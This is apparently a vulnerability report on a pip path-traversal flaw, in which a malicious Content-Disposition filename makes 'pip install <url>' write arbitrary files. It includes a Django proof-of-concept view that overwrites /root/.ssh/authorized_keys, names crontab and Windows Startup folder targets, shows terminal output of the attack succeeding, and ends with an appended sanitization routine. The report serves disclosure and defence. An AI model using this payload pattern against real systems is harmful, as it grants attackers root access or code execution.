Environment
- pip version: pip 19.0.3
- Python version: Python 2.7.15 / Python 2.7.15
- OS: Ubuntu 16.04 / Windows 10
Description
This is a security vulnerability.
When installing a remote package via a specified URL ("pip install <url>"), a malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with a filename that contains "../". pip did not sanitize the filename and joins the temporary directory and the filename as the download path, which can write an arbitrary file, potentially leading to command execution.
The issue occurs in _download_http_url in src/pip/_internal/download.py.
PoC:
For Linux, pip usually requires root privileges, so we can write the following files to get a root shell:
/root/.ssh/authorized_keys
/etc/crontab
For Windows, we can write a batch file to the user's startup directory, leading to command execution on next boot:
C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
For the malicious header:
from django.http import HttpResponse

def linux(request):
    response = HttpResponse("malicious public key\n")
    filename = "../../../../../root/.ssh/authorized_keys"
    response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext
    response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename)
    return response
Result of pip install with the malicious URL:
root@DESKTOP-FRESH:~# pip install http://192.168.40.16/linux
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting http://192.168.40.16/linux
Downloading http://192.168.40.16/linux
Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format
Cannot determine archive format of /tmp/pip-req-build-UAVkjW
root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys
malicious public key
root@DESKTOP-FRESH:~#
similar issue:
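One way to handle the header defensively, as an added example that is neither pip's code nor the reporter's: keep only the final path component of the Content-Disposition filename, then verify that the joined path still resolves inside the temporary directory. The function names and the `download` fallback name are assumptions; `naive_download_path` reproduces the unsanitized join described in the report, for comparison.

```python
import os
from email.message import Message


def _header_filename(header_value):
    """Parse the filename parameter out of a Content-Disposition value."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    return msg.get_filename()


def naive_download_path(temp_dir, header_value):
    """Pattern from the report: server-supplied filename joined unsanitized."""
    return os.path.normpath(os.path.join(temp_dir, _header_filename(header_value)))


def sanitized_filename(header_value, default_name="download"):
    """Return only the last path component, or default_name if nothing usable."""
    raw = _header_filename(header_value)
    if not raw:
        return default_name
    # Treat both separators as path separators regardless of the host OS.
    name = raw.replace("\\", "/").split("/")[-1]
    if name in ("", ".", ".."):
        return default_name
    return name


def safe_download_path(temp_dir, header_value, default_name="download"):
    """Join temp_dir and the sanitized name; refuse anything that escapes it."""
    name = sanitized_filename(header_value, default_name)
    base = os.path.realpath(temp_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # Second line of defence: the resolved path must stay under base
    # (this also catches a symlink planted at the target name).
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("filename escapes download directory: %r" % name)
    return candidate
```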